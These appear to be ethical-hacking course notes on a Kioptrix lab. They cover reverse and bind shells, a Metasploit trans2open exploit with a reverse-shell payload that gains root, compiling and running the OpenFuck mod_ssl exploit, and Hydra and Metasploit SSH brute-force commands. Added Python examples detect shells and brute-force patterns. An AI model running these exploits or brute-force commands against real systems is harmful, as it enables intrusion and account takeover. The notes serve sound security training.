Exploitation Basics – Practical Ethical Hacking by TCM

by Kal Bartal

Reverse Shells vs Bind Shells

Source: https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/

The most common shell is a reverse shell.

A shell is access to a machine; popping a shell means getting that access. A reverse shell means the target machine connects back to us.

With a bind shell we open a port on the target machine and connect to it ourselves.

Reverse shells are far more common (around 95% of the time).

Bind shells are more typical in external assessments.

Reverse shell

Bind shell
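The difference between the two comes down to which side initiates the connection, and that is also how a defender spots them on a host. The following is an added example, not part of the original notes or the TCM course: it parses a constructed socket table in the style of `ss -tnpa` (the sample lines, process names and addresses are made up) and flags sockets owned by a shell interpreter, tagging a listening shell as the bind-shell pattern and a shell holding an outbound connection as the reverse-shell pattern. The ephemeral-port cut-off and the list of shell binaries are assumptions chosen for the example.

```python
import re
from collections import namedtuple

# Constructed sample modelled on `ss -tnpa` output (not a real capture):
# socket state, local address, peer address, owning process.
SAMPLE_SOCKETS = """\
State   Local Address:Port   Peer Address:Port    Process
LISTEN  0.0.0.0:22           0.0.0.0:*            users:(("sshd",pid=812,fd=3))
ESTAB   10.0.0.5:443         10.0.0.9:51212       users:(("nginx",pid=1201,fd=7))
ESTAB   10.0.0.5:49822       203.0.113.7:4444     users:(("sh",pid=4471,fd=0))
LISTEN  0.0.0.0:4444         0.0.0.0:*            users:(("bash",pid=4490,fd=3))
ESTAB   10.0.0.5:22          10.0.0.9:60110       users:(("sshd",pid=2210,fd=4))
"""

# Interpreters that normally have no business owning a network socket (assumed list).
SHELL_BINARIES = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe"}

# Heuristic: a local port at or above this value is ephemeral, so this host
# initiated the connection (Linux default range starts at 32768).
EPHEMERAL_PORT_START = 32768

Finding = namedtuple("Finding", "kind pid process local peer")

LINE_RE = re.compile(
    r'^(?P<state>\S+)\s+(?P<local>\S+)\s+(?P<peer>\S+)\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)


def classify_sockets(text):
    """Return shell-owned sockets, tagged by the direction of the connection."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header line or a row we do not parse
        proc = m.group("proc")
        if proc not in SHELL_BINARIES:
            continue
        pid = int(m.group("pid"))
        local, peer, state = m.group("local"), m.group("peer"), m.group("state")
        if state == "LISTEN":
            # A shell waiting for inbound connections: the attacker connects in
            # to a port opened on the target (bind-shell pattern).
            findings.append(Finding("bind_shell", pid, proc, local, peer))
        elif state == "ESTAB":
            local_port = int(local.rsplit(":", 1)[1])
            if local_port >= EPHEMERAL_PORT_START:
                # Shell holding a connection it initiated to a remote peer: the
                # target called out to the attacker's listener (reverse-shell pattern).
                findings.append(Finding("reverse_shell", pid, proc, local, peer))
            else:
                # Connection accepted on a fixed port: an already-connected bind shell.
                findings.append(Finding("bind_shell_connected", pid, proc, local, peer))
    return findings


if __name__ == "__main__":
    for f in classify_sockets(SAMPLE_SOCKETS):
        print(f"{f.kind:<20} pid={f.pid:<6} {f.process:<6} {f.local} <-> {f.peer}")
```

On a real host the same logic runs over `ss -tnpa` output; sshd and nginx rows are ignored because they are expected socket owners, while the `sh` process connected out to port 4444 and the `bash` process listening on 4444 are the two findings.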

Staged vs Non-Staged Payloads

Source: https://academy.tcm-sec.com/

A payload is the code the exploit delivers and runs on the target.

In Metasploit payload names, a forward slash ('/') between the stage and the transport (for example shell/reverse_tcp) identifies a staged payload, while an underscore (shell_reverse_tcp, as used below) identifies a non-staged one.
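The naming rule is easy to apply by hand but also easy to get wrong when reading a long payload list, so here is an added example (not from the original notes or from Metasploit itself) that parses a payload name into platform, stage, stager, staging mode and connection direction. The set of stage names is an assumption covering the common Metasploit stages; the rule that a '/' separates stage from stager in staged payloads and a '_' fuses them in stageless ones is the convention the notes describe.

```python
# Stage names Metasploit pairs with a separate stager (assumed list of the
# common ones; not exhaustive).
STAGE_NAMES = {"shell", "meterpreter", "vncinject", "dllinject", "upexec", "custom"}


def parse_payload(name):
    """Split a Metasploit payload name into platform, stage, stager, staging and direction."""
    parts = name.strip("/").split("/")
    if len(parts) < 2:
        raise ValueError(f"not a payload path: {name!r}")
    last, prev = parts[-1], parts[-2]

    if prev in STAGE_NAMES:
        # Stage and stager are separate path components joined by '/': staged.
        staging, stage, stager = "staged", prev, last
        platform = "/".join(parts[:-2])
    elif any(last.startswith(s + "_") for s in STAGE_NAMES):
        # Stage and stager fused with '_' into one component: stageless (non-staged).
        stage, stager = last.split("_", 1)
        staging, platform = "stageless", "/".join(parts[:-1])
    else:
        # No recognised stage: a 'single' payload, also delivered in one piece.
        staging, stage, stager = "single", None, last
        platform = "/".join(parts[:-1])

    if stager.startswith("reverse"):
        direction = "reverse"   # target connects back to our listener
    elif stager.startswith("bind"):
        direction = "bind"      # target opens a port and we connect to it
    else:
        direction = "none"      # e.g. local exec payloads with no network transport

    return {"platform": platform, "stage": stage, "stager": stager,
            "staging": staging, "direction": direction}


if __name__ == "__main__":
    for name in ("linux/x86/shell/reverse_tcp", "linux/x86/shell_reverse_tcp",
                 "windows/x64/meterpreter_reverse_https", "windows/shell/bind_tcp"):
        p = parse_payload(name)
        print(f"{name:<40} {p['staging']:<10} {p['direction']:<8} stage={p['stage']}")
```

The payload switched to later in the notes, linux/x86/shell_reverse_tcp, parses as stageless and reverse; its staged sibling differs only by the slash.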

Gaining Root with Metasploit

msfconsole
search trans2open
use 1
options
set rhosts 192.168.57
show targets
run

(or, equivalently: exploit)

The session dies straight away because the default payload is staged. Switch to a non-staged payload and run again:

set payload linux/x86/shell_reverse_tcp
run

whoami
root
hostname
kioptrix.level1

Manual Exploitation
mod_ssl exploit (OpenFuck)

https://github.com/heltonWernik/OpenLuck

1. Download OpenFuck.c

git clone https://github.com/heltonWernik/OpenLuck.git

2. Install the OpenSSL development library

apt-get install libssl-dev

3. Compile it

gcc -o OpenFuck OpenFuck.c -lcrypto

4. Run the exploit

Running the binary with no arguments prints its usage and the list of target IDs; 0x6b is the target ID used here.

./OpenFuck
./OpenFuck 0x6b 192.168.57.134 -c 40

Brute Force Attacks
Brute-forcing SSH is typically not the low-hanging fruit.

Still, there are three reasons for trying it:

  1. Testing password strength
  2. Testing whether we can get in with a weak or default password
  3. Testing how well the blue team performs

Hydra is a brute-force tool.

hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://192.168.57.134:22 -t 4 -V

or, using the Metasploit SSH login scanner:

msfconsole
search ssh

(result 17 in the list: auxiliary/scanner/ssh/ssh_login)

use auxiliary/scanner/ssh/ssh_login
options
set username root
set pass_file /usr/share/wordlists/metasploit/unix_passwords.txt
set rhosts 192.168.57.134
run

Credential Stuffing and Password Spraying

Credential Stuffing

source: https://www.owasp.org

Credential stuffing is the automated injection of breached username/password pairs into a login form in the hope of taking over accounts.

In the attack results, look for a change in the response status code.

Add a string from the response text to the grep match rule so successful logins stand out.

Password Spraying
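The third reason given above for brute-forcing, testing how well the blue team performs, and the credential-stuffing and password-spraying notes all come down to login patterns a defender should be able to tell apart in the logs: a brute-force run hammers one account with many passwords, while a spray or a stuffing run touches many accounts with only one or two attempts each. The following is an added example that is not part of the original notes: it parses constructed sshd auth.log lines (the hostnames, users and addresses are made up) and classifies each source address by attempt volume and account spread. The thresholds are assumptions; spraying and stuffing cannot be separated from failed-login lines alone because the password tried is not logged, so the share of "invalid user" attempts is reported as a supporting hint that the usernames came from somewhere else.

```python
import re
from collections import defaultdict

# Constructed sshd-style auth.log sample (not a real capture).
SAMPLE_AUTH_LOG = """\
Jan 10 10:00:01 host sshd[1001]: Failed password for root from 203.0.113.7 port 51000 ssh2
Jan 10 10:00:02 host sshd[1002]: Failed password for root from 203.0.113.7 port 51001 ssh2
Jan 10 10:00:03 host sshd[1003]: Failed password for root from 203.0.113.7 port 51002 ssh2
Jan 10 10:00:04 host sshd[1004]: Failed password for root from 203.0.113.7 port 51003 ssh2
Jan 10 10:00:05 host sshd[1005]: Failed password for root from 203.0.113.7 port 51004 ssh2
Jan 10 10:00:06 host sshd[1006]: Failed password for root from 203.0.113.7 port 51005 ssh2
Jan 10 10:02:10 host sshd[1101]: Failed password for alice from 198.51.100.9 port 40000 ssh2
Jan 10 10:02:11 host sshd[1102]: Failed password for bob from 198.51.100.9 port 40001 ssh2
Jan 10 10:02:12 host sshd[1103]: Failed password for invalid user carol from 198.51.100.9 port 40002 ssh2
Jan 10 10:02:13 host sshd[1104]: Failed password for invalid user dan from 198.51.100.9 port 40003 ssh2
Jan 10 10:02:14 host sshd[1105]: Failed password for erin from 198.51.100.9 port 40004 ssh2
Jan 10 10:02:15 host sshd[1106]: Failed password for invalid user frank from 198.51.100.9 port 40005 ssh2
Jan 10 10:02:16 host sshd[1107]: Accepted password for erin from 198.51.100.9 port 40006 ssh2
Jan 10 10:05:00 host sshd[1201]: Failed password for alice from 10.0.0.9 port 50000 ssh2
Jan 10 10:05:03 host sshd[1202]: Accepted password for alice from 10.0.0.9 port 50001 ssh2
"""

LOG_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for (?P<invalid>invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\d+(?:\.\d+){3}) port \d+"
)

# Assumed thresholds; tune them to the environment.
BRUTE_MIN_ATTEMPTS = 5    # this many guesses against one or two accounts
SPRAY_MIN_USERS = 5       # this many distinct accounts from one source
SPRAY_MAX_PER_USER = 2.0  # and at most this many attempts per account


def summarise(lines):
    """Aggregate login attempts per source address."""
    per_ip = defaultdict(lambda: {"attempts": 0, "users": set(), "invalid": 0, "success": set()})
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue  # not a password-auth line
        s = per_ip[m["ip"]]
        s["attempts"] += 1
        s["users"].add(m["user"])
        if m["invalid"]:
            s["invalid"] += 1   # account does not exist on this host
        if m["result"] == "Accepted":
            s["success"].add(m["user"])
    return per_ip


def classify(lines):
    """Label each source as brute_force, spray_or_stuffing, or benign_or_unknown."""
    verdicts = {}
    for ip, s in summarise(lines).items():
        n, u = s["attempts"], len(s["users"])
        if n >= BRUTE_MIN_ATTEMPTS and u <= 2:
            kind = "brute_force"          # many passwords, one account
        elif u >= SPRAY_MIN_USERS and n / u <= SPRAY_MAX_PER_USER:
            kind = "spray_or_stuffing"    # many accounts, few tries each
        else:
            kind = "benign_or_unknown"
        verdicts[ip] = {
            "kind": kind,
            "attempts": n,
            "distinct_users": u,
            "invalid_user_ratio": s["invalid"] / n,
            "compromised": sorted(s["success"]),
        }
    return verdicts


if __name__ == "__main__":
    for ip, v in classify(SAMPLE_AUTH_LOG.splitlines()).items():
        print(f"{ip:<14} {v['kind']:<18} attempts={v['attempts']:<3} users={v['distinct_users']:<3} "
              f"invalid={v['invalid_user_ratio']:.2f} compromised={v['compromised']}")
```

Against the sample, the hydra-style run from 203.0.113.7 is reported as brute force, the many-account run from 198.51.100.9 as spray or stuffing with one account actually logged in, and the single user who mistyped once from 10.0.0.9 as nothing to act on.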
